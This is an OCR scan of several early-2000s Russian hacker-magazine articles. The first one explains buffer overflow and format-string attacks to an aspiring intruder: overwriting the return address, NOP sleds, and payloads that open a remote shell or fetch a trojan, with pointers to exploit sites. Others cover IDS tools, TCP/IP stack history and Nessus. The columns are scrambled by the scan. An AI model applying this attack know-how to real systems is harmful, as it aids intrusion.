стек, как правило, имеет четкий раз- 
мер, и при занесении в стек пози- 
ция записи передвигается вперед, 
при вытаскивании вершина Nepeg- 
вигается в том же направлении. То 
есть они просто ходят по кругу. Сис- 
тема очень напоминает работу с по- 
токами данных. 


ы 
Организация стека FIFO в памяти 


К сожалению, никому не дано понять, что такое стек. Ты все должен увидеть сам. 


Съешь красную пилюлю - и я покажу тебе дизассемблер и что творится на самом деле 
в компьютере. Съешь синюю - и ты проснешься в привычном мире окон... 


ЧТО ТУДА ПОПАДАЕТ? 

Любой язык программирования под 
любой платформой использует 
функции. Холостых функций, кото- 
рые не принимают и не возвращают 
значения, очень мало. Поэтому 
прежде всего при обращении к 
функции в стек заносится переда- 
ваемое значение. Затем адрес возв- 
рата, то есть место программы, отку- 
да функция была запущена. Во вре- 
мя работы функция выгребает все 
данные из стека, так или иначе ис- 
пользует их, затем записывает вы- 
ходные данные (если это не буле- 
вое значение), и программа возвра- 
щается в точку, из которой была за- 
пущена функция. При этом нет раз- 
ницы - мастдай это или правильная 
система. В обоих случаях работа со 
стеком идет на уровне ассемблера, 
а он един для всех осей. Самое 
главное, что в ассемблере никак не 
проверяется, а то ли количество 
байтиков записано в стек при пере- 
даче в функцию (или при возврате 
из нее). Поэтому, если программер 
не проверил все ручками, есть ре- 
альная маза залить туда чуть боль- 
ше ожидаемого. 


ИМЕЕМ ИСХОДНИК 
Можно найти слабое место в коде 
проги простым перебором. Тут запи- 
сать логин в 20 кило, там прописать 
пароль в 300 кило. Или установить 
соединение и послать OxOO, то есть 
ничего не послать. Это хорошо под 
мастдаем, где недоступны исходни- 
ки. Для линуха все несколько про- 
ще. Самое легкое - это найти патч 
для линуха и посмотреть, что же он 
меняет. В программах на С есть нес- 
колько стандартных слабых мест. 
Например, имеется функция логина, 
в которой сам логин представлен 
как массив Char размером в 200 
байт. А тот, кто вызывает эту функ- 
цию, не проверяет длину. Тут мы и 
пишем в логине 5-6 кило текста и 
смотрим, где сглючило. Эта атака 
называется buffer overflow, и при 
записи мусора получается DoS. 
Есть еще одна смешная атака - тот 
самый «срыв стека». Для нее не на- 
gO писать в стек, достаточно взять 
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лишнего. Например, есть такая 
функция printf. Чтобы вывести твое 
имя на экран, правильно было бы на- 
писать printf(«%S»,name). Но можно 
и проще: рип (пате). Однако пере- 
дай вместо своего имени строку 
%$%$%5%$ - и ты явно увидишь 
кишки стека, потому что все функ- 
ции пользуют один и тот же стек. 
Данная дырка называется format 
string vulnerability (нарушение cpop- 
мата строки). Просто программер ga- 
же не подумал о том, что внутри име- 
ни может быть форматированная 
строка. Результатом может быть все, 
что угодно. Можешь увидеть логин и 
шифрованный пароль или кучу ин- 


настоящая жертва поступит так же. 
Очень редко бывает так, что локаль- 
но все висит, а удаленно все остает- 
ся в порядке. Чаще все бывает нао- 
борот: локально все жужжит и лета- 
ет, а через Инет происходит DoS, и 
приходится ждать резета. 


САМОДЕЛКИ 

Ты нашел супер-пупер дырку. Или 
прочитал про нее в сети, но не на- 
шел эксплоита. Значит, наступило 
время писать все самому. Разберем 
дырку с buffer overflow. Самое глав- 
ное для нас - перезаписать адрес 
возврата и поместить его в начало 
(или середину) нашего кода, кото- 


Если нужна символьная строка, это не 
значит, что хватит 1024 байта, - найдутся 
записавшие 50 Kuno. 


тересной внутренней инфы програм- 
мы. Можешь просто сорвать стек и 
устроить DoS, если функция не вы- 
равнивает стек при выходе. 


полигон 
Лучше всего при подготовке к войне 
устроить локальный полигон, в точ- 
ности повторяющий ландшаст поля 
битвы. Есть два варианта. Более go- 
рогой - это купить себе второй комп 
и превратить его во вражеский, уста- 
новив нужную ось и настроив нуж- 
ные проги. Более дешевый - поста- 
вить себе эмуля (VMWare или Virtual 
РС) и настроить под ним все, что на- 
go. Главное - не забудь про сервис- 
паки и патчи. Если есть 5 сканеров, 
используй все. Потому что чем бли- 
же ты заточишь свой комп к вражес- 
кому, тем более предсказуемый ре- 
зультат ты получишь. 

Если твой комп намертво виснет от 
эксплоита, то не исключено, что и 


рый мы передадим на машину. Как 
пишется сам шелл-код, здесь опи- 
сывать нет смысла, так как каждая 
конкретная дырка требует особого 
подхода. 

Скажу, что основных методов заю- 
зать возможность переполнения 
буфера не так уж много. Для лину- 
ха проще всего организовать за- 
пуск шелла с перенаправлением 
ввода и вывода на удаленный комп. 
Для мастдая часто используют go- 
загрузку трояна из сети, поскольку 
для закачивания урлы достаточно 
одного вызова WinAPI. Простран- 
ства в эксплоите всегда не хватает, 
поэтому лучше сделать маленький 
эксплоит и дописать его спереди ко- 
дом Ox90, что есть пор и даст нам 
запас на промах мимо начала шелл- 
кода в 2-3 байта. 

Что же произойдет, когда мы пере- 
запишем адрес возврата? Функция, 
отработав, вместо того чтобы вер- 
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нуться и материть нас, выполнит 
наш код, который мы ей передали 
внутри нашего длинного запроса. 


ГДЕ ВЗЯТЬ ГОТОВОЕ? 

Если ты не очень рубишь в ассемб- 
лере, а тебе просто позарез хочется 
попасть на чужую машинку, то мож- 
но попытаться поискать в сети что- 
нибудь, что сможет работать. Если 
скачанный из сети эксплоит не фу- 
рычит так, как надо, не удивляйся. В 
последнее время крайне редко по- 
падается прога, которую не надо 
дописывать и в которой не надо ме- 
нять что-нибудь перед компиляци- 
ей. Прежде всего тебе надо заста- 
вить ее скомпилиться. Не советую 
тебе доверять уже готовым бинар- 
никам. Как правило, их компилят 
под определенные цели, а авторы 
эксплоитов редко выносят их наст- 
ройки наружу кода. При выборе 
сайта лучше обрати внимание на 
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Не удивляйся, 
что родной 
Касперский 

будет ругать- 

ся на все 
эксплоиты, - 
он считает их 
вирями. 


Картинка с сайта void.ru: 
срыв стека в мастдае 


паги хак-команоа - там скорее появ- 
ляются свежие программки, и они 
более работоспособны. Не удивляй- 
ся, что родной Касперский будет ру- 
гаться на все эксплоиты, - это не 
вирь внутри (что тоже не исключе- 
но), это, так сказать, срезание 
скрипт кидисов. Человек, который 
сам написал эксплоит или хотя бы 
понял, как он работает, и сам соб- 
рал его, будет уверен в том, что 
прога безопасна. Те же, для кого С 
лишь буква алфавита, а ассемблер 
- это ругательство, просто побоятся 
запускать эксплоит или «вылечат» 
его, после чего он потеряет все 
свои свойства. 


Если клиент 
передает серве- 
ру минимум 10 
байт, проверь, 
что будет с 
прогой при пус- 
той передаче. 


ССЫЛКА 

Очень неплохой сайт - WWW.USSI- 
back.com. Там часто появляются 
вполне работоспособные экземпля- 
ры с исходниками. Пишут ребята, 
как правило, на ассемблере. 
www.securityfocus.com раньше был 
если не первым, то одним из луч- 
ших сайтов для поиска описаний и 
эксплоитов. В настоящий момент на 
нем легко найти описания свежих 
дырок и патчи, и уже в зависимости 
от того, что они меняют, можно на- 
писать эксплоит. Не забывай, разу- 
меется, и про родную асталависту с 
пакет-штормом. 
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Обы 4hack 


IDS практи- 
чески не обна- 
руживаются 
сканерами 
портов. Кос- 
венным подт- 
верждением 
может слу- 
жить недос- 
тупность узла, 
который за се- 
кунду до ска- 
нирования был 


доступен 


Vitls (vitls@chat.ru) 


у так вот. Возжелал ты 

чужую систему хак- 

нуть удаленно. Ну там 
разведочку провел более-менее 
грамотно. Выяснил, какие сервисы 
работают. Потом начал всяческие 
активные действия. И... бамц! Ни фи- 
га не получается. Или того хуже - 
твой провайдер тебе звонит и сооб- 
щает, что ты, типа, козел и нехоро- 
шестями всякими занимаешься. 

Спрашивается, откуда информа- 

ция? Отвечаю: админ узла, который 
ты взарючить пытался, не совсем 
чайник, иу него в огороде сидит 
собачка. Называется ее порода 
Networl Intrusion Detection System - 
система обнаружения вторжений 
из сети (NIDS или просто IDS). 


КАК РАБОТАЮТ IDS"bi? 
В природе существует несколько 
видов IDS. Системы обнаружения 
атак на сетевом уровне контролиру- 
ют пакеты в сетевом окружении и 
обнаруживают попытки хакера-ка- 
кера проникнуть внутрь защищае- 
мой системы (или реализовать ата- 
ку типа "отказ в обслуживании"). 
Типичный пример - система, кото- 
рая контролирует большое число 
ТСР-запросов на соединение (так 
называемый SYN-nakeT) со многими 
портам на выбранном компьютере. 
Таким макаром программа обнару- 
живает, что кто-то пытается осуще- 
ствить сканирование ТСР-портов. 
Система обнаружения атак на сете- 
вом уровне (NIDS) может запускать- 
ся либо на отдельном компьютере, 
который контролирует свой 
собственный траффик, или на выде- 
ленном компьютере, прозрачно 
просматривающем весь трафик в 
сети (концентратор, маршрутиза- 
тор). Отмечу, что "сетевые" IDS 
контролируют много компьютеров, 
тогда как другие системы обнаруже- 
ния атак контролируют только один 
(тот, на котором они установлены). 
Системы контроля целостности 
(System integrity verifiers, SIV) прове- 
ряют системные файлы для того, 
чтобы определить, когда хакер внес 
в них изменения. В принципе, это ма- 
ло интересно, если систему вскрыли. 
Но, тем не менее, позволяет доволь- 
но быстро определить, что подверг- 
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ЧЕМ NIDS ГРОЗИТ ХАКЕРУ? 


Конфигурим LIDS 


лось изменению и, соответственно, 
быстро восстановить систему. 

Мониторы системных журналов 
(Log-file monitors, LFM) контролируют 
регистрационные срайлы, создавае- 
мые сетевыми сервисами. Аналогич- 
но NIDS, эти системы ищут известные 
признаки атаки, только в файлах ре- 
гистрации, а не в сетевом трафике, 
которые указывают на то, что злоу- 
мышленник осуществил атаку. Ти- 
пичным примером является синтак- 
сический анализатор для |09-файлов 
НТТР-сервера, который ищет хаке- 
ров, пытающихся использовать хоро- 
шо известные уязвимости, например, 
проводя атаку типа "phf". 


СОФТ? 

Для операционной системы Linux 
есть несколько программ, реализу- 
ющих IDS. Есть коммерческие и 
очень дорогие супер-пупер-про- 
фессиональные системы (напри- 
мер, RealSecure компании Internet 
Security Systems 
(http://www.iss.net) стоимостью в 
пару тысяч баксов), а есть и сво- 
бодные или бесплатные программы 
начального уровня. 

Среди свободных программ попу- 
лярностью пользуются системы 
LIDS (Linux Intrusion Detection 
System, http://www.lids.org) и 
Snort (http://www.snort.org). Cpegu 
бесплатных популярна связка прог- 
рамм Portsentry, Hostsentry и 
Logsentry компании Psionic. 


LIDS 
Обзор начну с LIDS. По своему су- 
ществу LIDS относится к системам 
контроля целостности. Во время 
своей работы LIDS следит за состо- 
янием файловой системы, справля- 
ется со списками доступа и, в слу- 
чае неразрешенных действий, со- 
общает администратору о наруше- 
нии целостности. Данная система 
отличается тем, что на самом деле 
является патчем к ядру Linux. Поэ- 
тому для каждой версии ядра тре- 
буется своя реализация LIDS, что 
не совсем удобно. Плюс к ней пос- 
тавляется утилита lidsadm gna уп- 
равления. Несмотря на это, LIDS 
считается довольно мощным Cpeg- 
ством противостояния атакам имен- 
но благодаря тому, что жестко 
контролирует все происходящие в 
системе действия. 

В настройке LIDS очень непрост. 
Для установки сначала нужно на 
твое ядро наложить патч (именно 


SNORT, ловим атаки 


на твою версию ядра, иначе ни ‹и- 
га не заработает), сконфигурить 
его и пересобрать. Самое главное - 
не перегружаться, пока до конца не 
настроишь LIDS, иначе тебе конец. 
Если ты решишься заюзать LIDS, то 
будь готов к тому, что тебе придет- 
ся очень читать много документа- 
ции. Хорошо, что в Сети ее море, в 
том числе и на русском языке. 

Систему, на которой стоит грамот- 
но настроенный LIDS, практически 
невозможно вскрыть с налету. С 
его помощью можно, например, за- 
щитить головную страницу WWW- 
сервера от дефейсинга, предохра- 
нить системные журналы от неса- 
нкционированного изменения, 
скрыть критические процессы в 
списке выполняемых задач, запре- 
тить выполнение ядерных модулей 
и приложений и многое другое. 


SNORT 

Snort - гораздо проще, да и занима- 
ется он совсем другим. Snort - npak- 
тический пример системы обнару- 
жения вторжений из сети. Демон 
сидит в памяти и просматривает 
весь сетевой трафик. Перехвачен- 
ные пакеты поступают в анализа- 
тор, который на основе набора пра- 
вил, определяемых админом, прини- 
мает решение, происходит атака 
или обычная работа. К анализатору 
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2. Режим регистрации пакетов. 
Этот режим записывает пакеты на 
диск и декодирует их в ASCII формат. 
snort -| < directory to log packets to > 

3. Режим обнаружения вторже- 
ний. Этот режим является основ- 
ным. Snort -dev -1 <log directory> -h 
<host|net> -c <config> 

Snort очень выгодно отличается 
тем, что у администратора есть воз- 
можность составления своих 
собственных правил обнаружения. 
Это означает очень быструю реак- 
цию на новые типы атак и появление 
защитных механизмов. В Сети есть 
много источников, с которых можно 
скачать наборы правил gna snort. 


TRYSENTRY 

Самая простая, но He менее надеж- 
ная система обнаружения вторже- 
ний состоит аж из трех программ. 
Все вместе это называется 
Trysentry, а компоненты по отдель- 
ности - Postsentry, Hostsentry и 
Logsentry. Все три программы са- 
мостоятельны и распространяются 
независимо. Разрабатывала их 
компания Psionic. Нынче же эту 
фирму на корню скупила компания 
Cisco Systems? и ссылка 
www.psionic.com ведет на сайт 
Cisco. Тем не менее, в Сети есть ар- 
хивы, на которых что-то еще оста- 
лось. Поиск по слову 


Некоторые 105 интегрируются в систему 
как модуль ядра и жестко контролируют 
атаки еще на ядерном уровне. 


могут быть подключены сторонние 
модули, чтобы увеличить его функ- 
циональность. Информация, соб- 
ранная анализатором, поступает в 
систему предупреждения и регист- 
рирования. Таким образом распоз- 
наются разнообразные нападения 
типа переполнения буфера, скры- 
тых просмотров порта, CGl-aTak, по- 
пыток определения OS ит.п. 

Для успешной сборки и установ- 
ки необходимо наличие библиотеки 
libpcap и утилиты tcodump. Ha сай- 
те доступны исходные тексты Snort 
версии 2.0. Компиляция и инстал- 
ляция проблем не вызывают. Вол- 
шебная сила команд configure; 
make; make install просто чудеса 
творит. Затем нужно создать ката- 
лог (какой-нибудь /var/log/snort) 
для хранения журналов. 

Запуск snort -? выведет тебе спи- 
сок команд. Ты его внимательно 
изучишь и начнешь настраивать. 
Snort выполняется в трех различ- 
ных режимах: 

1. Режим пакетного снифоера. Kor- 
ga Snort работает в этом режиме, он 
читает и дешифрует все сетевые па- 
кеты и формирует дамп к stdout (эк- 
ран). Для перевода snort в режим 
снифоера юзай ключ -\: snort -v 


portsentry.tar.gz (например, на сай- 
те filesearch.ru) может дать тебе 
некий список. 

Logsentry является утилитой 
контроля целостности системных 
журналов. Ничего сложного - сле- 
дит за тем, чтобы в них без разре- 
шения никто не лез. 

Назначение программы hostsentry 
для меня осталось загадкой, на 


практике я ее так и не применил. 
Гораздо интереснее возиться с 


Лог. Типа, нас просканили 


portsentry. Основная задача этой 
проги - отследить соединение к ох- 
раняемому порту, выявить тип сое- 
динения и принять меры по блоки- 
ровке атакующего. 

Программа существует в двух 
версиях: 1.1 и 2.0beta. После распа- 
ковки и сборки пакета (инструкция 
есть в файлах INSTALL и README) 
следует настроить сторожа. В фай- 
ne portsentry.conf указываются но- 
мера портов, которые необходимо 
охранять по типам пакета (tcp, 
udp), способы реагирования Ha ата- 
ку (можно прибить маршрут коман- 
дой route или применить пакетный 
фильтр ipchains/iptables). Практи- 
ческий пример есть на сайте 
http://ruwa.te.ru. В файле portsen- 
{гу /пдоге указываются сети и узлы, 
которые не являются атакующими. 
История атак хранится в файлах 
portsentry.history и 
portsentry.blocked. 

Версия 1.1 (1.0) и 2.0 отличаются 
немного. Версию 1.0(1) нужно запус- 
кать два раза: отдельно для {ср и 
отдельно gna чар. Во второй вер- 
сии в конфиг добавлена возмож- 
ность указать адрес контролируе- 
мого интерфейса, а также совме- 
щен просмотр {ср и чар. В Сети 
полно статей по работе с portsen- 
{гу. Поисковик тебе в зубы. 

У данной IDS есть теоретический 
недостаток. Возможность исполь- 
зовать нестандартные параметры 
соединения с разрешенным пор- 
том. Так возникает возможность, к 
примеру, использовать http-TyHHe- 
лирования для передачи нелегаль- 
ного трафика. Snort в этом отноше- 
нии гибче за счет настраиваемых 
правил отлова пакетов. 

Теперь ты многое знаешь о том, 
что тебя подстерегает. И еще... 10$ 
практически не обнаруживаются. 
По крайней мере сканерами пор- 
тов. Лишь косвенным подтвержде- 
нием может служить недоступность 
узла, который за секунду до скани- 
рования был доступен. 


Tan 
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ВТЕМ/СТЕКуемся? 


Обы 4hack 


Про различные 
протоколы 
можно почи- 
тать на 
www.proto- 
cols.com. 
Странно, ga? :) 


Kirion (Kirion@winfo.org) 


СТЕКуемся? 


РЕАЛИЗАЦИЯ СТЕК ПРОТОКОЛОВ ТСРЛР 


"Ошибка в стеке позволяет провести эту aTaky...", "Эксплоит основан на ошибке в 


реализации стека..." - читал такое? Наверняка, даже в этом номере есть подобные 
фразы :). А что же это такое, стек ТСРЛР, и какие в нем могут быть ошибки? И 
почему одни ОСи работают в сети быстрее других? А почему все не любят стек в 
винобах ;)? Попробуем разобраться... 


тек... лично мне ка- 
жется не очень корре- 
ктным такое назва- 
ние. Как у студента- 
программиста, у меня стек в пер- 
вую очередь ассоциируется со спо- 
собом организации памяти. Так что 
не путай эти два понятия. 


ИСТОРИЯ 

Итак, что же такое стек TCP/IP? Чет- 
кого определения нет, в литературе 
под стеком понимаются две вещи. 
Во-первых, это все протоколы семей- 
ства ТСРЛР. А во-вторых, это некото- 
рый набор программ, библиотек, мо- 
дулей ядра и T.g. (по-разному быва- 
ет), интегрированных в ОС (хотя бы- 
вают и самостоятельные коммерчес- 
кие стеки) и отвечающих за созда- 
ние, отправку, прием и обработку ин- 
формации по стандартам TCP/IP. Как 
и многие другие сетевые стандарты, 
стек TCP/IP был разработан военны- 
ми, а точнее ARPA (Advance Research 
Projects Agency) при министерстве 
обороны США для своего главного 
проекта - сети ARPAnet. Первая pea- 
лизация стека появилась в 1980 го- 
gy. Чтобы подтолкнуть исследова- 
тельские институты к использованию 
новых протоколов, агентство распро- 
страняет их реализацию по очень 
доступным ценам и заключает дого- 
вор с институтом Беркли на внедре- 
ние стека в их популярную BSD Unix. 
Реализация стека получилась весь- 
ма удачной. Она быстро приобретает 
популярность благодаря схожести 
новых программных средств ТСРЛР с 
классическими средствами Unix. Kpo- 
ме того, ученые из Беркли вводят в 
стек такое важное понятие, как порт 
и сокет, что позволило активно ис- 


Сайт IRTF - а здесь можно почитать про ис- 
следования в области сетевых технологий 
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Сайт IETF - здесь всегда можно найти 
все ВЕС 


пользовать протоколы TCP/IP в при- 
ложениях. Число компьютеров, подк- 
люченных к сети, растет. Десятки 
компаний пытаются улучшить стек, 
внести свои изменения. Чтобы дер- 
жать ситуацию под контролем, почти 


оказалось, адаптировали они его 
плохо :). 1997 год - столько раз 
www.microsoft.com He висел и боль- 
ше, наверное, висеть не будет. Слово 
Мике быстро вошло в обиход хакеров 
:). Несложные в реализации и весьма 
эффективные, эксплоиты этого вида 
наводнили сеть. Впрочем, летели не 
только винды. Некоторым известным 
атакам (тот же Land) были подверже- 
ны и *п системы. Ну а что вы хоти- 
те, стек-то в основе одинаковый :). 
1998 год - четыре SP для WinNT, еще 
куча мелких обновлений и Windows 
98 с "надежным стеком". Ага, пове- 
рили. Один баг с IGMP чего стоит. A 
еще и ошибки в маршрутизации, неп- 
равильная обработка сфрагментиро- 
ванных пакетов, ошибки с NetBIOS 
(это, похоже, фамильная черта :))... А 
помнишь, сколько было в Инете прог 
по оптимизации стека (трояны, расп- 
ространявшиеся под такими лозунга- 
ми, опустим :)), которые в основном 
изменяли MTU (точнее MaxMTU, max- 
imum maximum transmission unit B 
терминологии MS :))? В следующей 
операционной системе, 


Как и многие другие сетевые стандарты, 
стек TCP/IP был разработан военными 


через десять лет после создания 
протоколов учреждаются две иссле- 
довательские группы: IRTF, занимаю- 
щаяся перспективами развития 
Internet, и IETF, занимающаяся раз- 
работкой текущих стандартов, новых 
протоколов и улучшением старых. 
1991 год, появляются самые первые 
версии Linux. Реализация стека 6e- 
рется из уже проверенной временем 
BSD, хотя в дальнейшем стек был 
серьезно изменен. 1993 год - 
Microsoft, уже поработавшая на OS/2 
и собственной версией Unix (да, было 
и такое чудо под названием Xenix), 
собирается создавать новую версию 
Windows, однако "не видит необходи- 
мости в реализации ТСРЛР". 1995 год 
- Windows95 со встроенным стеком 
TCP/IP :). Самая популярная версия о 
происхождении этого чуда произво- 
дительности - "заимствование" все 
того же стека от Беркли :). Этот же 
стек был внедрен в Windows МТ. Как 


Windows 2000, стек был новый (почи- 
тать об этом неземном творении 
можно на WWw.microsoft.com/ 
technet/treeview/default.asp?url= 
/technet/itsolutions/network/deploy 
/depovg/tcpip2k.asp). К чести 
Microsoft, стоит заметить, что новый 
стек получился весьма надежным и 
быстрым и практически полностью 
соответствующим стандартам. Нако- 
нец-то появились встроенные сете- 
вые диагностические утилиты, к кото- 
рым уже давно привыкли пользова- 
тели правильных осей :). Хотя и в но- 
вом стеке периодически находят уяз- 
вимости, приводящие к DOS :), все же 
по качеству он близок к реализации 
в ядрах Linux 2.4.*. И хотя линуксои- 
ды никогда не признают этого и бу- 
дут ссылаться на исследования вро- 
де свежего майского от конторы 
Reasoning, которое сравнивает коли- 
чество ошибок в коде стека Linux и 
"некоторых коммерческих систем". 


Мне кажется, что это чистый РБ: ну 
кто будет давать им код стека 
Windows? А писать, что мы сравнили 
Linux и, скажем, Solaris, - это будет 
интересно уже куда меньшему числу 
компьютерщиков. А поскольку gpy- 
гих открытых исследований на эту те- 
му нет, то нет и темы для споров :). 


НАСТОЯЩЕЕ 

А что представляет собой современ- 
ный стандарт на стек TCP/IP? Kak из- 
вестно, стек состоит из четырех 
уровней (в отличие от семиуровне- 
вой модели OSI): уровня приложе- 
ний, транспортного, сетевого и ка- 
нального уровней. На каждом уров- 
не находятся свои протоколы. Ин- 
формация, которая передается по 
сети, проходит по всем уровням про- 
TOKONOB, сверху вниз. На каждом 
уровне соответствующий протокол 
дописывает свой заголовок к пакету 
и передает вниз, gO канального 
уровня, на котором окончательно 
сформированный кадр отправляется 
через сетевой интерфейс. Напри- 
мер, такая схема: НТТРУГСРУР?драй- 
вер сетевого интерфейса»сеть. Ha 
канальном уровне находится всего 
один важный протокол - АВР 
(Address resolution protocol, RFC 
826), который позволяет определять 
МАС-адрес сетевых интерфейсов. На 
сетевом уровне правят бал IP 
(Internet protocol, RFC 791) и вспомо- 
гательные протоколы маршрутиза- 
ции, главными из которых являются 
ICMP (Internet control message proto- 
col, RFC 792) и IGMP (internet group 
management protocol, RFC 2236). 
Протокол IP получает и отправляет 
датаграммы от одного 1Р-адреса к 
другому. При этом протокол не забо- 
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Представление информации на различных 

уровнях TCP/IP 
уровне у нас два протокола: ТСР и 
UDP. UDP (User datagram protocol, 
RFC768) - это более простой прото- 
кол. Он не контролирует надежность 
передачи данных и не устанавлива- 
ет соединение. Зато работает быст- 
рее и генерирует трафик меньше, 
чем ТСР. Применение UDP оправдан- 
но, если нужно передать небольшие, 
но срочные данные (например, DNS- 
запросы), если имеется хороший ка- 
нал связи (почти все локальные ча- 
ты работают Ha UDP) или если на- 
дежность доставки гарантируется 
другими средствами (игровые прото- 
колы в основном используют UDP). 
В остальных случаях используется 
TCP (Transport control protocol, RFC 
793), который обеспечивает надеж- 
ную доставку сообщений. ТСР уста- 
навливает соединение, посылая сег- 
мент с установленным флагом SYN 
(Synchronize sequence numbers) и 
Initial Sequence Number (начальный 
номер последовательности) и полу- 
чая в ответ сегмент с флагом АСК 
(Acknowledgment). Это так называе- 
мый механизм "ТСР handshake". На- 
чальный номер последовательности 
нужен для нумерации сегментов в 
установленном соединении: они ну- 
меруются по определенному закону 
(зависит от реализации стека) и ис- 


Стек... лично мне кажется не очень 
корректным такое название. 
Как у студента-программиста, у меня стек 
в первую очередь ассоциируется 
со способом организации памяти 


тится о надежности передачи и не 
имеет механизма подтверждения - 
все это есть уже на транспортном 
уровне. ICMP же используется для 
передачи служебной и управляю- 
щей информации, например, о не- 
достижимости узла или перенаправ- 
лении пакетов. А IGMP используется 
для управления широковещатель- 
ными (multicast) сообщениями, поз- 
воляя узлу сообщать маршрутизато- 
рам о своей принадлежности к груп- 
пам. Современные стеки поддержи- 
вают такие расширения IP, как CIDR 
(Classless Internet Direct Routing, 
прямая бесклассовая маршрутиза- 
ция в Интернет), переходное, но ус- 
пешное решение до ввода !Р\б, и 
IPsec, протокол шифрования на се- 
тевом уровне. На транспортном 


пользуются для контроля при пос- 
туплении (чтобы не пропустить сег- 
мент). Кроме того, для каждого сег- 
мента подсчитывается контрольная 
сумма, что позволяет обнаружить 
его повреждение при передаче и 
запросить новый (по известному но- 
меру последовательности). Ну а уро- 
вень приложений - это множество 
протоколов высокого уровня: тут и 
HTTP, и FTP, POP3, SMTP, SNMP, SSL 
и многие другие. Таков современный 
стек ТСРЛР в общем виде. Только вот 
в таком виде он не имеет будущего. 


БУДУЩЕЕ 

А все потому, что перед ТСРЛР сто- 
ит несколько серьезных проблем, 
которых не предвидели его созда- 
тели с самого начала. Первая и са- 
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Протоколы TCP/IP в модели OSI 


мая известная проблема - это не- 
достаток IP-agpecos. Если пару лет 
назад все думали, что с использо- 
ванием CIDR можно будет продер- 
жаться достаточно долго, то сейчас 
в Азии уже столкнулись с нехват- 
кой IP-agpecosB (китайцы наступают 
на Интернет :)). Вторая - это недос- 
таточность скорости ТСРЛР для та- 
ких проектов, Kak Internet 2, и для 
передачи таких данных, как голос, 
музыка, видео. Да, в заголовке IP 
датаграмм есть поле Туре of service, 
которое должно определять прио- 
ритет пакетов. Только оно игнори- 
руется во многих реализациях сте- 
ка. Да, есть службы вроде Quality 
of Service, но поднимите руки, кто 
не отрубил ее у себя в Win2k/XP, 
узнав, что она резервирует чет- 
верть трафика для себя. Ну a 
третья и самая важная - модель бе- 
зопасности ТСРЛР не отвечает сов- 
ременным требованиям. В протоко- 
ne IP нет аутентификации пакетов - 
слишком легко подменить [Р адре- 
сата или получателя, а на этом ос- 
новано огромное количество атак. 
Нет и встроенных средств шифро- 
вания (IPsec все же не слишком 
удобная и популярная вещь). Все 
эти проблемы решаются переходом 
на IPv6 - новую спецификацию IP 
протокола. Этот переход готовится 
уже почти десять лет. В новой спе- 
цификации есть и встроенные в 
протокол средства шифрования, и 
разделение приоритетов пакетов, и 
новые 128-разрядные адреса. К то- 
му же распределение адресов те- 
перь пойдет централизованно и по 
определенным принципам, а не так, 
как в начале истории Интернета. 
Так что IPv6 несет для сетевого со- 
общества только положительные 
вещи. Правда, хакать станет слож- 
нее :). Но не бойся, новый протокол 
появится не сразу и не везде. И 
что-то мне подсказывает, что пер- 
вые версии новых стеков будут не 
менее богатыми на баги, чем памят- 
ный стек Win95 :) БВ 
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Очень неплохой 
учебник по 
ТСРЛР можно 
найти на 
athena.vvsu.ru/ 
net/book/ 
index.html 


O06 IPv6 и его 
внедрении в 
России можно 
почитать на 
www.ip6.msu.ru 
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NESSUS = ИНСПЕКТОР 


ПО ОТВЕРСТЬИЦАМ 


СКАНЕР БЕЗОПАСНОСТИ ДЛЯ LINUX 


Vitls (vitls@chat.ru) | 


этот раз я тебе намерен 
подробно рассказать про 
| одну из самых лучших 
программ проверки комплексной 
безопасности сетей и узлов под Мпих. 
Называется эта программа Nessus. 


что кан ЗА ДЕВОЧКА? 
Nessus ( /. S.0rg) состоит из 
двух частей: серверной и клиентской. 
Серверная часть (nessusd) предназначена 
для проведения тестовых атак и сбора 
информации в одну кучу. В то же время 
клиент является простым интерфейсом 
пользователя для отображения 
собранной информации и предоставления 
ее в удобоваримом виде. На сегодняшний 
день программа написана так, что 
серверная часть может работать на 
нескольких операционных системах 
стандарта POSIX (этот стандарт 
поддерживается операционными 
системами Solaris, FreeBSD, GNU/Linux и 
другими), а BOT клиенты есть Kak для 
Linux с использованием библиотеки СТК+ 
(the ae oe подробности смотреть 
тут: http: org), так и для Win32. 


ПОСТАВИМ В ПОЗУ 
С чего начать? Ну, наверное, с того, что 
скачаем исходники с сайта. Потом надо 
попытаться собрать серверную и 
клиентскую части. В моем дистре ALT 
Linux Master 2.2 Nessus версии 1.2.6 был в 
комплекте, поэтому мне напрягаться не 
пришлось. На сайте есть ссылка на 
версию 2.0, но для ее сборки нужна 
библиотека СТК 2.0 (и все, что она за 
собой потянет, а потянет она много 
всяких штук). Тебе же, возможно, 
придется пройти через огонь, воду и 
медные трубы при сборке. Кроме 
библиотеки GTK+, тебе потребуется 
скачать и установить дополнительно 
пакет OpenSSL (v issl.org). Сборка 
и установка OpenSSL проблем вызвать не 
должны. Он нужен для работы системы 
разграничения доступа к серверу nessusd. 
Конечно, если твой дистрибутив на базе 
rpm, то установка необходимых пакетов 
программ и библиотек существенно 
облегчается. По крайней мере, ты будешь 
в курсе того, что тебе еще предстоит 
доустановить. Хоть компилировать 


самому не придется. В случае 
дистрибутива Debian - тебе просто 
повезло (apt-get весьма удобная штука). 

Nessus - программа клиент-серверная, 
поэтому весьма необходимо 
разграничивать доступ к демону nessusd. 
В принципе тебе должно быть пофиг. 
Однако данный инструмент 
разрабатывался для администраторов, а 
им очень важно, чтобы доступ к такого 
рода программам был строго ограничен. 
Для этих целей используются 
сертификация и парольный доступ. 
Сертификацию как раз и обеспечивает 
OpenSSL. После компиляции и установки 
нужно: 

а) Проверить наличие установленного 
сканера ми Если € его нет - установить 
отсюда - j.ins / - или из 
дистрибутива, Nmap - не обязательный, 
но весьма желательный для работы 
компонент. Сборка птар тоже проблем 
доставить не должна. Традиционные 
заклятия configure; make; make install уже 
должны стать привычными для тебя. 
Программа прекрасно собирается на 
старых системах (проверено на Мапагаке 
Linux 7.0 выпуска 2000-го года). 

6) Создать сертификат для 
пользователей сервера командой nessus- 
mkcert (от root). 

в) Завести пользователя командой nes- 
sus-adduser (от root). 

г) Запустить демона nessusd (от root). 

Если все прошло нормально, то можешь 
от простого пользователя запускать 
клиента NeSSUS и попытаться войти в 
программу с тем именем и паролем, 
которые задал в nessus-adduser. Если что- 
то не получается (появляется окошко с 
надписью Login failed), то читаем 
документацию и man nessus. Справка хоть 
и на английском, но толковая. 


ВОЙДЕМ? 
После успешного входа (рисунок) 
появится главное окно. Вкладка Nessusd 
host позволит подключиться к демону 
nessusd. Там все предельно просто. 
Указываешь адрес и порт, на котором 
работает nessusd. Для локальной машины 
значения равны localhost и 1241. 
Соединение прошло нормально - во 
вкладке Plugins увидишь список 


